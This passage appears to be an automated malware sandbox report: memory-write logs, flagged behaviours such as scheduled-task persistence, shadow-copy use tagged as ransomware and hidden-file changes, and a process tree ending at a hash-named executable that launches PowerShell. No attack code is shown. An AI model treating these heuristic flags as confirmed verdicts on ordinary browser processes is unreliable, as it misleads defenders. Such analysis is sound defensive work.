PID 2292 wrote to memory of 696	2292	firefox.exe	94
PID 2292 wrote to memory of 696	2292	firefox.exe	94
PID 2292 wrote to memory of 696	2292	firefox.exe	94
PID 2292 wrote to memory of 696	2292	firefox.exe	94
PID 2292 wrote to memory of 696	2292	firefox.exe	94
PID 2292 wrote to memory of 696	2292	firefox.exe	94
PID 2292 wrote to memory of 696	2292	firefox.exe	94
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 1152	696	firefox.exe	95
PID 696 wrote to memory of 3192	696	firefox.exe	96
PID 696 wrote to memory of 3192	696	firefox.exe	96
PID 696 wrote to memory of 3192	696	firefox.exe	96
PID 696 wrote to memory of 3192	696	firefox.exe	96
PID 696 wrote to memory of 3192	696	firefox.exe	96
PID 696 wrote to memory of 3192	696	firefox.exe	96
PID 696 wrote to memory of 3192	696	firefox.exe	96
PID 696 wrote to memory of 3192	696	firefox.exe	96

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
8608	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3468
- C:\Windows\system32\mspaint.exe
  "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\000IDMFLAXS7KD29-C324-F4.jpg"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:640
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2292
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - NTFS ADS
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:696
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 27196 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a64b3be0-64e3-4711-b320-572f07705399} 696 "\\.\pipe\gecko-crash-server-pipe.696" gpu
      4⤵
      PID:1152
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2384 -prefMapHandle 2380 -prefsLen 27074 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5fc9d3a5-e7d7-4213-98e5-c6652c35f94f} 696 "\\.\pipe\gecko-crash-server-pipe.696" socket
      4⤵
      PID:3192
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3024 -childID 1 -isForBrowser -prefsHandle 3016 -prefMapHandle 3012 -prefsLen 27215 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ee6dfa4-6230-4263-abe6-b4e9050a19cb} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:884
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4000 -childID 2 -isForBrowser -prefsHandle 3992 -prefMapHandle 3988 -prefsLen 32448 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {84b65317-bfca-4f39-a648-677f6562c39f} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:4964
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4908 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4824 -prefMapHandle 4864 -prefsLen 32448 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f90e438-d3fd-4059-83f3-36eaa04aa8e6} 696 "\\.\pipe\gecko-crash-server-pipe.696" utility
      4⤵
      Checks processor information in registry
      PID:5360
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5208 -childID 3 -isForBrowser -prefsHandle 5200 -prefMapHandle 5100 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fbe1c58f-ce1a-4b7d-a222-5f6c9f952fb2} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5816
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5348 -childID 4 -isForBrowser -prefsHandle 5356 -prefMapHandle 5360 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e362d9ae-5537-4d77-876e-9ec2bcd3d44c} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5828
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5540 -childID 5 -isForBrowser -prefsHandle 5548 -prefMapHandle 5552 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {425979ee-e9d5-4e2d-aa2f-d92c38004026} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5840
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2292 -childID 6 -isForBrowser -prefsHandle 6064 -prefMapHandle 6060 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98cbf541-9f47-4c69-805a-e55320e44dbf} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:1800
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5816 -childID 7 -isForBrowser -prefsHandle 5240 -prefMapHandle 5228 -prefsLen 27305 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {05da0602-4d8f-4644-9003-00923b9dd777} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5308
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2700 -childID 8 -isForBrowser -prefsHandle 5820 -prefMapHandle 5816 -prefsLen 27495 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ad98a51-38ee-4c6b-a5d4-48ab6e6d85eb} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:6092
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6356 -childID 9 -isForBrowser -prefsHandle 3660 -prefMapHandle 6364 -prefsLen 27495 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b759f0ec-981b-4e47-a188-1e43a072f34a} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:6100
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5704 -childID 10 -isForBrowser -prefsHandle 4636 -prefMapHandle 6004 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a92839e8-d038-4bcf-a4cd-ebd4ca69432a} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5836
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6796 -childID 11 -isForBrowser -prefsHandle 6816 -prefMapHandle 6852 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e709c60-e5c9-45e6-a0af-57f6447d5c40} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5540
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6984 -childID 12 -isForBrowser -prefsHandle 6992 -prefMapHandle 6988 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75b03b52-be60-4998-87b8-588c4b0c1492} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:2208
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6336 -childID 13 -isForBrowser -prefsHandle 2932 -prefMapHandle 6376 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2069ff88-3c10-4312-9afb-761469b228f0} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:1764
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6740 -childID 14 -isForBrowser -prefsHandle 6916 -prefMapHandle 6912 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24b69080-196e-4b4d-b7a1-16b25aca9b7a} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:4100
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6688 -childID 15 -isForBrowser -prefsHandle 4576 -prefMapHandle 4692 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f9597b2-1edb-4795-9443-4fab32091b2b} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:708
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6500 -childID 16 -isForBrowser -prefsHandle 6488 -prefMapHandle 6380 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e18246d0-c3cc-4924-9059-3fc95fbb63dc} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5888
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1432 -childID 17 -isForBrowser -prefsHandle 6496 -prefMapHandle 6504 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1340ed97-b33d-4df5-8357-d8829d08d1bf} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:2180
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6076 -childID 18 -isForBrowser -prefsHandle 7452 -prefMapHandle 2292 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d647a47f-b814-4dd0-8ccb-b56b3af39988} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5196
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7372 -childID 19 -isForBrowser -prefsHandle 6404 -prefMapHandle 5072 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a63db156-d845-4f9b-b443-64ccbb5e7c3f} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5108
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7696 -childID 20 -isForBrowser -prefsHandle 7704 -prefMapHandle 7684 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {36fea4e0-72b1-4f2b-ab2a-ea12cb0179fd} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:1800
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7980 -childID 21 -isForBrowser -prefsHandle 7596 -prefMapHandle 7592 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0d72507-1a83-44fd-8c45-12a246b5972e} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:2684
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8044 -childID 22 -isForBrowser -prefsHandle 7632 -prefMapHandle 8144 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2d63da4-2f39-47ee-86c4-6a5bca84b8b6} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:2020
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6564 -childID 23 -isForBrowser -prefsHandle 8144 -prefMapHandle 6560 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {676d0621-0805-45e7-831b-15b40959a9e3} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:1672
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7884 -childID 24 -isForBrowser -prefsHandle 7860 -prefMapHandle 6740 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01badb57-d463-4435-ae91-63f7f9cc5e53} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5632
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7188 -childID 25 -isForBrowser -prefsHandle 7836 -prefMapHandle 7824 -prefsLen 28134 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bd9f87c-de67-47a5-b765-0e3a29b6a376} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:2360
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7908 -childID 26 -isForBrowser -prefsHandle 6588 -prefMapHandle 8408 -prefsLen 28418 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c48925d-a6a2-44e3-a088-3437e9069c41} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5460
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8136 -childID 27 -isForBrowser -prefsHandle 1432 -prefMapHandle 8176 -prefsLen 28418 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f12f6fb-6abf-4c48-b704-8061a40a462a} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5080
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8360 -childID 28 -isForBrowser -prefsHandle 8356 -prefMapHandle 7172 -prefsLen 28418 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ded6f17-96c5-48b8-a914-a0fcd84a74e7} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:4512
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8688 -childID 29 -isForBrowser -prefsHandle 8692 -prefMapHandle 8680 -prefsLen 28418 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77e4c8de-3eb1-4f4a-844f-fbf66b46ba36} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5232
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8752 -childID 30 -isForBrowser -prefsHandle 9048 -prefMapHandle 9056 -prefsLen 28418 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d6d7428-e0cf-47e2-9d1b-5a571159b9f1} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:5388
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9104 -childID 31 -isForBrowser -prefsHandle 9108 -prefMapHandle 9112 -prefsLen 28418 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6442e0eb-b763-4a6d-972c-55319beab18e} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:2012
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9416 -childID 32 -isForBrowser -prefsHandle 9404 -prefMapHandle 7596 -prefsLen 28418 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11c2b4eb-1edf-4253-879f-56ba87429236} 696 "\\.\pipe\gecko-crash-server-pipe.696" tab
      4⤵
      PID:1928
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap21483:5084:7zEvent13210
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4892
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe55c2cc40,0x7ffe55c2cc4c,0x7ffe55c2cc58
    3⤵
    PID:2876
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,13222546251591926631,6098708732745354374,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=1756 /prefetch:2
    3⤵
    PID:3084
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,13222546251591926631,6098708732745354374,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=1972 /prefetch:3
    3⤵
    PID:6048
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2304,i,13222546251591926631,6098708732745354374,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2536 /prefetch:8
    3⤵
    PID:5700
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,13222546251591926631,6098708732745354374,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3184 /prefetch:1
    3⤵
    PID:2624
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,13222546251591926631,6098708732745354374,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3436 /prefetch:1
    3⤵
    PID:2032
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4552,i,13222546251591926631,6098708732745354374,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4600 /prefetch:1
    3⤵
    PID:5824
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4408,i,13222546251591926631,6098708732745354374,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4892 /prefetch:8
    3⤵
    PID:5560
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3732,i,13222546251591926631,6098708732745354374,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4920 /prefetch:8
    3⤵
    PID:3668
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=240,i,13222546251591926631,6098708732745354374,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5164 /prefetch:8
    3⤵
    PID:3668
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4900,i,13222546251591926631,6098708732745354374,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4728 /prefetch:8
    3⤵
    PID:4836
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5132,i,13222546251591926631,6098708732745354374,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4896 /prefetch:1
    3⤵
    PID:1440
- C:\Users\Admin\Downloads\sieben\e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe
  "C:\Users\Admin\Downloads\sieben\e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
